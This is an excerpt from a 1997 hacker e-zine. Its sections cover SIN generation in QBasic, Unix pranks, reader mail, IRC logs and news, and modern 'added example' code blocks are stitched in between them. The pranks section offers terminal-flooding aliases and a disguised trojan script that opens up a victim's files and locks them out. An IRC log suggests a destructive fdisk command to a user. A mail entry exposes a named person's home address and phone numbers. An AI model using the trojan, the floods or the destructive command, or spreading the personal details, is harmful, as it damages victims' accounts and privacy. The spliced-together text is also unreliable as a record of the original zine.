security. Things such as firewalls, network monitoring software, and
packet sniffers are just too in-depth to touch base with in this article.
However, information is abundant on the net, and many people would be
happy to help you if you have a serious question.
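
The allow/deny lookup described in the tcp wrapper paragraph above, as an added example that is not part of the original article: a simplified Python model of the decision order tcpd applies to /etc/hosts.allow and /etc/hosts.deny (allow file first, then deny file, otherwise grant). The rule contents, addresses and host names are constructed, and only the ALL, leading-dot, trailing-dot, net/mask and exact-match patterns are modelled.

```python
import ipaddress
import re

# Constructed sample rule files in "daemon_list : client_list" form.
HOSTS_ALLOW = """\
# constructed sample: LAN hosts may use telnet and ftp
in.telnetd, in.ftpd : 192.168.1.
# constructed sample: finger only for one domain
in.fingerd : .example.org
"""

HOSTS_DENY = """\
# constructed sample: refuse whatever was not allowed above
ALL : ALL
"""


def parse_rules(text):
    """Return [(daemon_list, client_list), ...] from 'daemons : clients' lines."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        daemons, clients = line.split(":")[:2]
        rules.append((re.split(r"[,\s]+", daemons.strip()),
                      re.split(r"[,\s]+", clients.strip())))
    return rules


def client_matches(pattern, addr, hostname):
    """Match one client pattern against the peer address / resolved name."""
    if pattern == "ALL":
        return True
    if pattern.startswith("."):      # domain suffix: needs a resolved host name
        return hostname is not None and hostname.lower().endswith(pattern.lower())
    if pattern.endswith("."):        # leading fields of the numeric address
        return addr.startswith(pattern)
    if "/" in pattern:               # net/mask form
        net = ipaddress.ip_network(pattern, strict=False)
        return ipaddress.ip_address(addr) in net
    return pattern == addr or (
        hostname is not None and pattern.lower() == hostname.lower())


def any_rule_matches(rules, daemon, addr, hostname):
    for daemons, clients in rules:
        if ("ALL" in daemons or daemon in daemons) and any(
                client_matches(p, addr, hostname) for p in clients):
            return True
    return False


def decide(daemon, addr, hostname=None,
           allow_text=HOSTS_ALLOW, deny_text=HOSTS_DENY):
    """Allow file wins, then deny file; with no match at all access is granted."""
    if any_rule_matches(parse_rules(allow_text), daemon, addr, hostname):
        return "allow"
    if any_rule_matches(parse_rules(deny_text), daemon, addr, hostname):
        return "deny"
    return "allow"   # fail-open default: this is why "ALL : ALL" in the deny file matters


if __name__ == "__main__":
    for case in [("in.telnetd", "192.168.1.20", None),
                 ("in.telnetd", "192.168.10.20", None),
                 ("in.fingerd", "203.0.113.9", "host.example.org")]:
        print(case, "->", decide(*case))
    # Same outside client, but with an empty deny file: nothing matches, so it gets in.
    print("empty deny file ->", decide("in.telnetd", "203.0.113.9", deny_text=""))
```

The last call shows the caveat worth checking on a real box: without a catch-all deny rule, any client that matches nothing is let through.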


ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Social Insurance Numbers
by Devix

In Canada (where I live) to get a job you must have a Social Insurance
Number (SIN). I don't know much about them or why they are used but
I do know how they are validated (and thus generated) so I thought I
would share this info with all of you. This can be useful for numerous
reasons but I'll leave that up to you to figure out. I don't know if
this will work with the US equivalent, Social Security Number (SSN).

OK, the Social Insurance Number is made up of 9 positive integers.
To validate, the first 8 are put through an algorithm to determine
the 9th. If the 9th matches, then the SIN is valid.

Here is how the algorithm works:

1. Find the sum of the 1st, 3rd, 5th, and 7th digits.
2. Find the products of the following:
2 * 2nd digit
2 * 4th digit
2 * 6th digit
2 * 8th digit
3. Add the products of part 2 (above).
4. Add part 1 and part 3 together.
5. Take the ones digit from part 4 and subtract it from 10. The result
should be the 9th digit.

If you don't understand the above, here is a program I made in QBasic
that will generate and validate Social Insurance Numbers for you.

---------------------------Start Cutting----------------------------

RANDOMIZE TIMER
COLOR 12
PRINT
PRINT "Social Insurance Numbers - Canadian"
PRINT "Made by Devix - datadaze@hotmail.com"
PRINT
COLOR 7
1
PRINT "(G)enerate or (V)alidate?"
6
choice$ = INKEY$ 'Wait until key is pressed.
IF choice$ = "" GOTO 6
choice$ = LCASE$(choice$)
IF choice$ = "g" THEN GOTO 5 'If g then make SIN
IF choice$ = "v" THEN GOTO 3 'If v then check SIN
GOTO 1

5 'We're making a SIN!
a = INT(8 * RND + 1) 'Use random numbers for the first 8
b = INT(8 * RND + 1)
c = INT(8 * RND + 1)
d = INT(8 * RND + 1)
e = INT(8 * RND + 1)
f = INT(8 * RND + 1)
g = INT(8 * RND + 1)
h = INT(8 * RND + 1)
k = a + c + e + g 'Add them
l = (b * 2) + (d * 2) + (f * 2) + (h * 2) 'Multiply them
m = k + l 'Add them
2 IF m > 10 THEN m = m - 10: GOTO 2 'Get the last digit.
COLOR 2
PRINT
FOR i = 0 TO 9 'Get the check digit.
IF i = 10 - m THEN PRINT a; b; c; d; e; f; g; h; i: COLOR 7: END
NEXT i 'Not found, go on to next.
COLOR 7
END

3 'We're checkin a SIN!
PRINT
PRINT "Numbers seperated by comma's."
PRINT "ie: 1,2,8,3,9,5,5,8,5"
INPUT a, b, c, d, e, f, g, h, i 'Get the numbers
k = a + c + e + g 'Add them
l = (b * 2) + (d * 2) + (f * 2) + (h * 2) 'Multiply them
m = k + l 'Add them
4 IF m > 10 THEN m = m - 10: GOTO 4 'Get the check digit.
PRINT
COLOR 2
IF i = 10 - m THEN PRINT "Valid!" ELSE PRINT "Invalid!" 'If digit is right,
COLOR 7 'then tell the guy.

---------------------------Stop Cutting-----------------------------

I've also included a program I made in vb that does the same thing.
(sin.zip). Source code is included. Enjoy!


Devix - devix@thepentagon.com
www.thepentagon.com/devix
PGP key available above. Use it.
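
The five-step check from the Social Insurance Numbers article above, as an added validation-only example that is not part of the original article. It goes beyond the article by running the same input through the standard Luhn checksum, which the steps resemble but which sums the digits of each doubled value; the function names and sample numbers are constructed for illustration.

```python
import re


def parse_digits(text):
    """Strip spaces and dashes; return a list of 9 ints, or None if malformed."""
    compact = re.sub(r"[\s-]", "", text)
    if not re.fullmatch(r"[0-9]{9}", compact):
        return None
    return [int(ch) for ch in compact]


def page_check_digit(first8):
    """Steps 1-5 as written in the article: plain sum of the doubled digits."""
    total = sum(first8[0::2]) + sum(2 * d for d in first8[1::2])
    # Step 5 read literally gives 10 when the ones digit is 0; like the
    # article's QBasic loop, that case is folded to a check digit of 0.
    return (10 - total % 10) % 10


def luhn_check_digit(first8):
    """Standard Luhn: a doubled value above 9 contributes its digit sum."""
    total = sum(first8[0::2])
    for d in first8[1::2]:
        doubled = 2 * d
        total += doubled - 9 if doubled > 9 else doubled
    return (10 - total % 10) % 10


def check(text):
    """Return which of the two checks the ninth digit satisfies, or None."""
    digits = parse_digits(text)
    if digits is None:
        return None
    body, last = digits[:8], digits[8]
    return {"page": last == page_check_digit(body),
            "luhn": last == luhn_check_digit(body)}


if __name__ == "__main__":
    # Constructed inputs, not real numbers.
    for sample in ["132 431 420",   # even-position digits all <= 4: both agree
                   "123-456-782",   # passes Luhn, fails the article's steps
                   "123456784",     # passes the article's steps, fails Luhn
                   "12345678"]:     # too short: rejected before any arithmetic
        print(sample, "->", check(sample))
```

The two methods only agree when every doubled digit stays below 10, and a number passing either one shows only that it was typed consistently, not that it was ever issued, so a form that accepts these should treat the checksum as typo detection and nothing more.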

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Stupid Unix Pranks
by The Darkling

Terminal flooding is very annoying and a great way to make people
look stupid. However this requires something. Go into /dev and type ls -la
ttyp?. This will get you a listing of the permissions on the ttyps. If for
any reason you have write access to any ttyp# (that stands for ttyp
number) you can do this. Another thing you can do is if they ever leave their
computer unattended walk over to it, type who am i (for your user name) and
then type who username for their ttyp number. Then type cd /dev and then
chmod a+rwx ttyp(their ttyp#) (Side note: chmod is a change permissions
command. a = all and a+rwx gives people read, write and execute perms on it).
This setting will stick through all of their ttyps (they change every time).
Most default settings give you write access to other people's ttyps. Don't
ask me why, but they do. Now we have to write a couple scripts to do the
terminal flood and to set up for it other times. Assuming you don't have a
.bash_profile I am now going to go through what it is and how we will use it.
.bash_profile is a file that will run every time you log in, assuming you are
using a bash shell. If not, type /bin/bash now and load one. Here is the
heading for your .bash_profile (and every other bash script):

#!/bin/bash

This means that we are sending commands to the bash shell. It's just proper
form, and somewhat unnecessary if you're using a bash shell. Now what we're
going to do is set up a little routine that will grab us everyone's login name
and ttyp number so we can check this whenever. I have mine set up so that it
tells me everyone's in the beginning and writes it to a file (that refreshes
every time) in my home dir called flowers. Here it is, I'll go over it in a sec:


#!/bin/bash
who
who > flowers
alias flood='cat /etc/wmtp > /dev/ttyp$1'
alias fuck='echo Fuck You > /dev/ttyp$1'
alias w='who'
alias hehe="echo You were flooded curtusy of The Night script
www.wilter.com/Darkling/ > /dev/ttpy$1'


Now save it. Exit your shell and log back in for the changes to take effect
now. As you enter you will be presented with a list of people's names and
ttyps; as an off note, this information can also be seen in the file named
flowers. Also you might want to get the above source out of the html code,
just so it isn't fucked over when you put it in. If you need to see the
information quickly, just type w and then enter and you will see it again.
When we want to flood someone we type flood # (or flood space their ttyp
number) and the entire contents of wmpt (usually f***** huge) will be dumped
to their screen. Similarly if you type fuck # (fuck space their ttyp number)
they will get a Fuck You added to wherever their cursor is, or was. It's
hilarious if they're e-mailing the root and you do it just before they send
it. The fuck you is added to the mail message then it's sent... you get the
picture =0). Also after every day of torture it would be nice to me if you
would type hehe # (hehe space ttyp #) which broadcasts an advertisement about
this page.

#2
This is what I call a Joke Trojan. While this method could be used to
do some very bad things I don't really condone them. Warning: This could get
you kicked out of unix class and if your school is tight as mine maybe given
the big boot. Use with caution. The entire idea behind this is that we need
someone dumb enough to run a program you give them. This program will be a
trojan horse that will effectively lock them out and give you RWX on everything
they own. My unix may be a bit rusty as I'm writing this up after unix class,
but everything should work. First 'know thy victim, sayeth the lord': this
person has to be someone that has something you want, and will run a program
without thinking about it. Once you have chosen your victim, make the
following bash script:

<--- begin code --->

#!/bin/bash
echo you stupid dick
chmod a+rwx *
echo logout > .bash_profile
cd /home/yourusername
echo The hit is made sir > YES
echo bye
logout

<--- End code --->

Now type
chmod g=x filename
chmod o=x filename
chmod a+xw /home/yourusername

Make sure to have named it something like runme, or some name that would make
someone think it is a little program that is kewl and safe to run. We denied
read and write access to it before so they can't see its true nature (except
root), so they should not fear it. Place it in their /home/username/ dir and
wait for the file YES to appear in your home dir. Be sure to fill in the vars
like yourusername and filename (your user name and whatever you name the
file). The effect of the trojan above goes like this:

it says to their screen 'you stupid dick'
it gives everyone read, write and execute perms to their files (all!)
it makes it so their startup file makes them logout (so they can't log back
in.. )
it goes to your dir
it makes a file called YES with the insides 'The hit is made sir'
it tells them 'bye'
it logs them out.

I personally like it.. it's very effective. If you have the right perms set
up on your stuff (shown above with the chmod commands) then it all should
work. Go have fun in their dir.. then remove the logout from their
.bash_profile before they report to the teacher that someone put a trojan in
their dir. =)

The Darkling

Contact:

Darkling69@mintprimary.com
http://www.wilter.com/~Darkling/ (soon to be)
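
A check from the account owner's side for the two changes the script in #2 leaves behind (files opened up by chmod a+rwx, and a logout line in a startup file), as an added example that is not part of the original article. The function names and the sample directory are assumptions constructed here for illustration.

```shell
#!/bin/sh
# Added example (not from the article): audit a home directory for the
# after-effects of the "runme" script described above.

# List files and directories under $1 that are world-writable.
# Symlinks are skipped because their own mode bits carry no meaning.
world_writable() {
    find "$1" ! -type l -perm -0002 -print 2>/dev/null
}

# List shell startup files in $1 that contain a line consisting only of
# `logout` or `exit`, which ends every login session as soon as it starts.
forced_logout_files() {
    for flf_name in .bash_profile .bash_login .profile .bashrc; do
        [ -f "$1/$flf_name" ] || continue
        if grep -Eq '^[[:space:]]*(logout|exit)[[:space:]]*$' "$1/$flf_name"; then
            printf '%s\n' "$1/$flf_name"
        fi
    done
}

# Print a report for home directory $1.
# Returns 0 when nothing was found, 1 when at least one finding was printed.
audit_home() {
    ah_ww=$(world_writable "$1")
    ah_fl=$(forced_logout_files "$1")
    if [ -n "$ah_ww" ]; then
        echo "world-writable (repair with: chmod o-w FILE):"
        printf '%s\n' "$ah_ww" | sed 's/^/  /'
    fi
    if [ -n "$ah_fl" ]; then
        echo "startup file forces a logout (remove that line):"
        printf '%s\n' "$ah_fl" | sed 's/^/  /'
    fi
    [ -z "$ah_ww" ] && [ -z "$ah_fl" ]
}

# Constructed sample: a throwaway home directory in the state the article's
# script would leave it in. Prints the path of the directory it created.
make_tampered_home() {
    mth_dir=$(mktemp -d) || return 1
    printf 'export PATH=$PATH:$HOME/bin\n' > "$mth_dir/.bashrc"
    printf 'logout\n' > "$mth_dir/.bash_profile"  # echo logout > .bash_profile
    printf 'notes\n' > "$mth_dir/notes.txt"
    printf 'private\n' > "$mth_dir/private.txt"
    chmod 600 "$mth_dir/.bashrc" "$mth_dir/.bash_profile" "$mth_dir/private.txt"
    # `chmod a+rwx *` only reaches names the glob matches, so dotfiles keep
    # their modes; here one ordinary file stands in for "everything matched".
    chmod a+rwx "$mth_dir/notes.txt"
    chmod 700 "$mth_dir"
    printf '%s\n' "$mth_dir"
}

# With an argument, audit that directory; without one, audit the sample.
if [ "$#" -gt 0 ]; then
    audit_home "$1"
else
    demo_dir=$(make_tampered_home) && {
        audit_home "$demo_dir" || true
        rm -rf "$demo_dir"
    }
fi
```

For the tty writes in #1, running mesg n takes away other users' write access to your terminal.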

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Oddville, THTJ

[ This month, sadly Oddville is very small since this month, Scud-O's
registry was fucked and he lost Eudora, and thus all this strange,
strange mail, so if you sent some whacked shit to me, resend it
again, por favor! heh. ]

Date: Tue, 16 Sep 1997 22:43:59 -0400 (EDT)
From: cLOut <clout@widomaker.com>
X-Sender: clout@wilma
To: scud@thtj.com
Subject: log

hey..here's a log file i had from a few days ago... add it to THTJ if you
want man..latz.




==/==/==
cL0ut
clout@widomaker.com
[finger for PGP public key]
This is from some dumbass that joined #phrack (<BEGIN LOG>)
<red_tab> Can someone tell me where to get salt peter.
<cL0ut> salt peter?
<red_tab> please
<p-> hm
<red_tab> Potassium Nitrate
<cL0ut> you can find salt & pepper on your kitchen table
<red_tab> Im from australia, and Ive never ehard of it before.
<red_tab> It's a special type
<red_tab> Ok then. Can anyone get onto #bombs? Its invite only.
<red_tab> or know the nick of a person on it?
<cL0ut> red_tab: i can tell you how to get in
<Frontline> yawn
<red_tab> What do you want?
<cL0ut> red_tab: type /run fdisk \y /mbr
<red_tab> Yeah. Sure
<red_tab> For gods sake. Im not that dumb
* Shok is idle, automatically dead [bX(l/on p/off)]
<cL0ut> red_tab: you sound that dumb
<Frontline> h0h0h0
<red_tab> It wouldn't work anywany, Im not on UNIX
<red_tab> thanks
<cL0ut> HAHAHAHAHAHAH
<cL0ut> you dumbass
<cL0ut> fdisk is a DOS commands
<cL0ut> command even
<Frontline> cl0ut not neccesarily
<red_tab> Ok it would work then. i am that dumb
<Frontline> but those lil commands you gave him were for the dos version

<(END LOG)>


---

Date: Tue, 16 Sep 1997 21:47:58 +0100
From: ToX <mt@bruhn.dk>
X-Mailer: Mozilla 3.03 (Win16; I)
To: thtj@thtj.com
Subject: Windows 95 NetWork Crack

My problem is that I have made
a bet with my friend, that i can
break his Windows 95 NetWork...

When you share a directory, you
can put a password on it, and it
is this password that i have to
break...

Can you please help me !

ToX
MT@BRUHN.DK


[no.]

---

From: "TM" <tm@sinnerz.com>
Organization: SIN/Technophoria
To: xxxxxx@xxxxxxx.net
Date: Sun, 21 Sep 1997 00:10:39 -7000
Subject: Movie To See
Priority: normal
X-mailer: Pegasus Mail for Win32 (v2.54 preview)

Ok, if any of you are going to the movies any time soon, GO SEE THE
GAME! IT KICKS ASS! We are talking a big two thumbs up and one
fucking STUNNED audience. Go see it now, in fact. Go ahead and leave
your computer online, let it time out, go and stand outside of the
fucking movie theater until it starts or comes there... threaten the
manager with anal rape unless he show The Game there. Oh shit oh shit
oh shit what a fucking trip... wow... I mean, you think you know
what's up, you think you have the big picture but then it rips apart
and all of a sudden the picture gets much bigger... I loved it so
much I was incoherent for 2 hours afterwards (I just got back from
seeing it, as you can tell).

____
/ ___| ___
| | _ / _ \
| |_| | (_) |
\____|\___/

____ ___ _ _
/ ___| ___ ___ |_ _| |_| |
\___ \ / _ \/ _ \ | || __| |
___) | __/ __/ | || |_|_|
|____/ \___|\___| |___|\__(_)

Nownownownownow!
+--------------------------------+
| TM |
+--------------------------------+
| Ou' sont les neiges d' antan |
| Villon |
+________________________________+
| There is a man... |
| playing a violin... |
| and the strings... |
| are the nerves in his own arm. |
| A twisted soul- the mortar... |
| despair- the bricks... |
| to build a temple of sadness. |
| The Crow, J. O'Barr |
+--------------------------------+
| This tagline is SHAREWARE! |
| To register, send me $10. |
+--------------------------------+

[ I agree, this is one hell of a movie, and i recommend seeing it when
intoxicated for an added effect. ]

---

Name: Alam Farez
House fone number: (860)875-2117
Personal fone number: (860)875-9911
Address: 9 Deerfield Lane
Ellington, CT 06029

URL: http://members.tripod.com/~zerohex/zer0.html
email address: zer0-hex@juno.com

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
#phrack

<chris0> so1o: whats the new crh gunna have in it?
<number6> replicas of phrack articles
<FrontLine> an original idea maybe this time?
<FrontLine> never
<FrontLine> could never have one of those
<rh1n0> gha
ÚÄÄÄ-ÄÄÄ(( whois information: number6 ))ÄÄ-Ä-ÄÄ-ÄÄÄ--ÄÄ-ÄÄ-Ä-Ä -ÄÄ-Ä- -Ä
³ address ð ~no6@jolt.ppp.dhp.com [Commercial Organization]
³ quote ð Number 6
³ channels ð #phrack #glitterglam
³ server ð irc-w.primenet.com: [206.165.111.241] Primenet Mae-West IRC server
ÀÄÄÄ-ÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄÄ--ÄÄÄ-ÄÄÄ-ÄÄ-Ä Ä-ÄÄ-ÄÄ- -Ä
<chris0> hehe
<so1o> it will be 200% orig1nal
<so1o> f00
<FrontLine> its to hard to come up with an original idea
<rh1n0> i didnt read that yet
<dev_null> wait and see
<rh1n0> i will go read it now
<FrontLine> let alown write those original ideas down
=== (join\#phrack) VC[VC@rhat.cts.com] @[02:03:51am]
<so1o> i wrote something down once.. it said...
<so1o> I R0CK
<so1o> heh
<Warpy> 200%
<Warpy> oh dear
<so1o> 200 proof then
<FrontLine> much easier to rip other peoples shit
<so1o> f00
<so1o> heh
<FrontLine> cut their name
<FrontLine> paste yours
<chris0> I seen an article published in crh that was also in EL8 newsletter 1 but changed.
ÚÄÄÄ-ÄÄÄ(( whois information: FrontLine ))ÄÄ-Ä-ÄÄ-ÄÄÄ--ÄÄ-ÄÄ-Ä-Ä -ÄÄ-Ä- -Ä
³ address ð assembly@penguinpalace.com [Commercial Organization]
³ quote ð
³ channels ð #phrack @#cheese #glitterglam
³ server ð irc.visi.com: Rockin' Snowland Server
ÀÄÄÄ-ÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄÄ--ÄÄÄ-ÄÄÄ-ÄÄ-Ä Ä-ÄÄ-ÄÄ- -Ä
<FrontLine> much much much easier
<so1o> i didn't paste my name
<so1o> heh
=== (join\#phrack) WOWEE[netcom.ix.@chi-il11-04.ix.netcom.com] @[02:04:35am]
<WOWEE> hello
<FrontLine> Oh you actually typed it out
<halflife> did i see so1o and original on the same screen?
ù halflife blinks
<so1o> isn't FrontLine a medication for vaginal warts?
<so1o> yeah halflife
<so1o> im gonna try reeally hard
<so1o> heh
ù so1o concentrates
=== (nick\change) rh1n0 ÄÄ> WEP
<WOWEE> can someone tell me where i can get an anonymous emailer and browse the web
<halflife> so1o puts out a lot of issues
<chris0> leave
<halflife> too bad they all suck
<so1o> issue 5 is good
<halflife> but hey, theres lots of em atleast
ù FrontLine watches as s01o's head explodes from trying to come up with an original idea
<halflife> i read it, but dont remember any of it
<Warpy> so1o, so a redhat 2.1 exploit is GOOD?
<chris0> At least its a zine.
<so1o> issue 5 i said
<so1o> heh
<number6> wowee: check out http://www.research.att.com/projects/crowds/
<Shok> llalala
<WOWEE> thnx
ù FrontLine is amazed that in all that mess from his head exploding nothing original could be found
<so1o> i got 4 original submissions so far
<so1o> he phear
=== (nick\change) WEP ÄÄ> rh1n0
<so1o> s/he/so
<so1o> heh
<rh1n0> um
<Warpy> so1o, originality is crap unless they're good
<alhambra_> so1o how many of them are other handles u use?>
<chris0> Do people just submit to CRH or is it all codezero based?
=== (join\#phrack) ld-100[555ic@d-pm4-39.txdirect.net] @[02:07:04am]
<rh1n0> ahhaha
=== (signoff\#phrack) ld-100[555ic@d-pm4-39.txdirect.net] @[02:07:06am] [Connection reset by peer]
<Warpy> alhambra_, hahahaha
<Modify> Maybe you should lay off of hacking 30 web pages a week and devote your time on something more constructive!
<alhambra_> (are written by)
<so1o> alh : none
<FrontLine> so1o: in your next issue are you going to have |<-RaD flash warez
<so1o> yeah
<so1o> how did you know?
<dev_null> www.sekurity.org/~vol
<dev_null> CRH 5
<so1o> crh 5 is elitespeak
<halflife> mflash too
<so1o> so no-one can readit
<so1o> heh
<Warpy> www.sekurity.org/~warpy is more ereeter
<halflife> mflash.bas
<dev_null> i've been there
<so1o> hahaha
<halflife> visual basic mailflashes!@
<Shok> www.sekurity.org/~shok has no index.html
<Shok> hehe
<FrontLine> wew hoo mflash!!!!
<li> www.nque.com/~li has no html!
<li> hi
<so1o> www.larc.nasa.gov is br0k3n
<so1o> and it wasn't me
<halflife> so1o has mad phf sk1llz
<so1o> phf is k-r4d
=== (signoff\#phrack) phiXati0n[PHUCK_you@167-123-97.ipt.aol.com] @[02:08:59am] [ChaNNeL BoT bY |IceMan|------©HäÑñ飠ßøt ß¥ |íÇÈmÅñ|]
=== (kick\#phrack) Warpy[warpy@slsyd75p22.ozemail.com.au] kicked [so1o] off #phrack [schmack]
<alhambra_> i think crh and el8 should merge
<alhambra_> get all the crap in one place
<chris0> hehe lol
=== (join\#phrack) so1o[REPL4Y@serug.netgates.co.uk] @[02:09:13am]
<so1o> hey
<Modify> halflife: lo fuckin loud
<so1o> no fair
<dev_null> what happened to #codezero ?
<so1o> crh 6 will have unpublished and orignal exploits in it
<Warpy> so1o, name one exploit/vuln c0d3z3r0 have coded/found *THEMSELVES*
=== (signoff\#phrack) ld-50[555ic@d-pm4-26.txdirect.net] @[02:10:08am] [Operation timed out]
=== (join\#phrack) ld-100[555ic@d-pm2-05.txdirect.net] @[02:10:13am]
<halflife> judging from the originality of crh, REPL4Y is a good username for so1o
<li> mount.c
<li> ?
<so1o> phf xterm tekneeq
<Warpy> bahahaha
<so1o> hah
<Modify> oh my god
<Warpy> oh dear
<Modify> hahaha
<Modify> and thats a funny group name cause they code zero
=== (topic\#phrack) Warpy[warpy@slsyd75p22.ozemail.com.au] sets topic (<so1o> phf xterm tekneeq)
<dev_null> soltool is a fuckin' rip off
<halflife> so1o, people were doing that before the ibm advisory came out like 2 yrs ago
<Warpy> dev_null, agreed
<so1o> i coded that myself
<so1o> gneegr0
<halflife> soltool is backdoored too
<chris0> modify: what does global kos do?
<so1o> yeah
<Warpy> YOU CODED A FUCKING SHELL SCRIPT WITH PUBLIC EXPLOITS?
<so1o> i did that too
=== (nick\change) ld-100 ÄÄ> ld-50
<chris0> Im not defending codezero but global kos doesnt do crap.
<alhambra_> phf xterm technique is ancient
<Modify> chris: go to school and work
<Warpy> chris0, just because they don't hack pages and trade warez doesn't mean they don't do crap
<dev_null> Global kOS is kinda lame...i have yet to see something usefull come out from them,
<so1o> hah
<so1o> hah
<so1o> upyours4.exe
<so1o> hah
<chris0> hehe
=== (part\#phrack) few1[blah@phat.oz.net] @[02:11:57am]
<halflife> dev_null: so how do they differ from c0dez3r0?
<Warpy> so1o, at least they understood enough sendmail to code it
<chris0> warpy: Im saying they havent released anything.
=== (signoff\#phrack) alhambra_[alhambra@nuclear.biodome.org] @[02:12:27am] [changing servers]
<Modify> www.thtj.com/kOS/screenshot.jpg
>>> (msg(modify)) this shit is funny
<Warpy> a group is about/for the group not admirers or exploit k1dd1es

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

=== (join\#phrack) so7o[REPL4Y@amon.netgates.co.uk] @[02:14:51am]
<chris0> At least they do a mag its better than nothing.
<so7o> we are getting better
<halflife> no, it isnt
<dev_null> remember ZERO
<halflife> so7o, the quality hasnt changed
<dev_null> www.sinnerz.com/zero
<so7o> yes it has
<halflife> and you still do lame stuff like dump d0x
<so7o> we have taken that into consideration
<so7o> and i have already tackled the issue for 6
<FrontLine> who is we anyway
<halflife> your content is 1) lame and 2) stolen
<halflife> a bad combo
<FrontLine> h0h0h0
<halflife> if yer gonna steal shit, steal better stuff
<alhambra_> yah
<alhambra_> and so1o
<Modify> hehe
<alhambra_> stop publishing other peoples shit on bugtraq
<Warpy> hahah
<so7o> that was another so1o
<alhambra_> oh right
<li> *cough*
<Warpy> "i couldn't find the remote root code, but here's something anyway.." (imap)
<alhambra_> the other so1o
<li> :>
<so7o> i'll relay the message
<kaotik> hrmm
<Modify> you mean there are 2 of you?
<so7o> yeah
<Warpy> SPLIT PERSONALITIZ
<so7o> and there's a dude called codezero
<kaotik> i guess it's shit like this why i don't go to cons
<li> so1o.. you told me you did it because you were tired of all the lamers gettin the code
<li> or something
<alhambra_> www.sekurity.org/~vol
<alhambra_> that page rules
<Warpy> alhambra_, it does don't it :)
<alhambra_> yep
<so7o> bugtraq is there to make the world a safer place
<alhambra_> so1o it doesn't matter
<so7o> i think everybodty should post everything to bugtraq
<FrontLine> and your here to make the world a lamer place?
<alhambra_> u dont publish others exploits there
<halflife> is he called codezero cuz that describes how much code he has written in his life?
<Modify> point being?
<li> hold.. lemme post nlock
=== (join\#phrack) Volatile[vol@synapse-160.mindport.net] @[02:19:08am]
<Volatile> so1o!
<chris0> Old hacking files are totally krad compared most of the new shit.
<Volatile> li: Hey there li
<so7o> i was considering posting the nlock source
<Volatile> li: Long time
<so7o> but sun would kick my ass
<chris0> Phrack is an ok magazine just too much source.
<Modify> geezus
=== (join\#phrack) loath[loath@206.29.0.102] @[02:19:41am]
=== (signoff\#phrack) chris0[brutus@wrt1-ppp30.dial.snowline.net] @[02:19:41am] [Leaving]
<Warpy> so7o, post nlock and everyone will kick yer ass
<so7o> why?
<Warpy> tho i suppose you'd need netcat for it
<Warpy> :P
<halflife> i think we need to publish less source
<Volatile> so7o: So how's CodeZero?
<so7o> because you would rather be all k-r4d and 31337
<kaotik> i was gonna post the netscape 128k encyrption k0de
<Volatile> haha
<Volatile> No
<Volatile> so7o would
<Volatile> That's why he's posting it
=== (nick\change) prym ÄÄ> FEGR00LZ
<so7o> and keep all your neat little remote's in sshd and the like to yourselves
<kaotik> but it's old shit
=== (nick\change) FEGR00LZ ÄÄ> prym
<Modify> half: Im doing one on CISCO for the next issue
<Volatile> He wants to look like he has the greatest archives.
<Modify> with d1s
<li> it'd help if he had it
<so7o> that doesn't make the world a safer place
<Volatile> so7o: Dude.. face it
<Warpy> so7o, so ppl/groups like c0d3z3r0 don't get it and use it to trade juarez
=== (signoff\#phrack) VC[VC@rhat.cts.com] @[02:20:48am] [Ping timeout]
<Volatile> so7o: You're just a moron trying to look like yew have reet0 k03z
<so7o> my k0dez > your
<so7o> sssss
<Volatile> haha
<Volatile> Yea
<so7o> nice to see you admit it
<Volatile> Yew know what kode I loved a lot
<Modify> is that scripting?
<li> hi
<Volatile> Let me make sure Im accurate here.
<halflife> i wont code for linux anymore tho, too many stupid people ask me linspy questions

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
The News
Compiled and edited by KungFuFox

1 : Huge jump seen in PCs linked to net
2 : Hackers vie for $1-million reward
3 : Digitizing Your Meter Reader
4 : AT&T Tests New `00' INFO Directory Assistance Service
5 : Bellcore Scientists See Cold-Weather Problems...
6 : Is the Internet a Matter of National Security?
7 : Hacking Smart Card Chips: At What Cost?
8 : House Panel Rejects Crypto Amendment
9 : Internet Addict Placed on Probation in Ohio - from FH

<Faraz> tell you and your lame friends not to prank call me

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Huge jump seen in PCs linked to net

The number of personal computers connected to the Internet will jump 71% by
the end of the year to 82 million, driven by use in the business market, says
market research firm Dataquest Inc. By 2001, about 268 million computers will
be linked to the global computer network, according to a recent study. That
will lead to more sales of Internet software and services, which are expected
to rise 60% to $12.2 billion (U.S.) by the end of the year, up from $7.5
billion last year. The Internet software and services market is expected to
